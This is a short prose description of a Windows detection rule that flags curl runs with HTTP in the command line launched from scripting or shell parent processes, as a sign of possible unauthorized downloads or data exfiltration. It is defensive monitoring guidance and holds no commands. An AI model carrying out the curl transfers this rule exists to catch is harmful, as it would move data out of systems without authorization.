This detection rule identifies the use of Curl for Windows that potentially signifies unauthorized file transfers through HTTP requests. Adversaries may exploit Curl to download or upload data to external URLs, which could indicate malicious behavior or compromise. The rule activates on events originating from a Windows environment, specifically targeting the execution of Curl while filtering out requests initiated by system processes. The detection logic emphasizes the command line containing 'http' and looks for parent processes associated with common scripting or command execution processes, indicating that the request may not be a legitimate administrative action. This rule is particularly useful for monitoring environments where Curl usage is not common, as it may highlight potential data exfiltration activities. Further investigation may involve assessing the executed processes and their legitimacy, checking the reputation of the domains involved, and conducting a forensic analysis if malicious activity is suspected.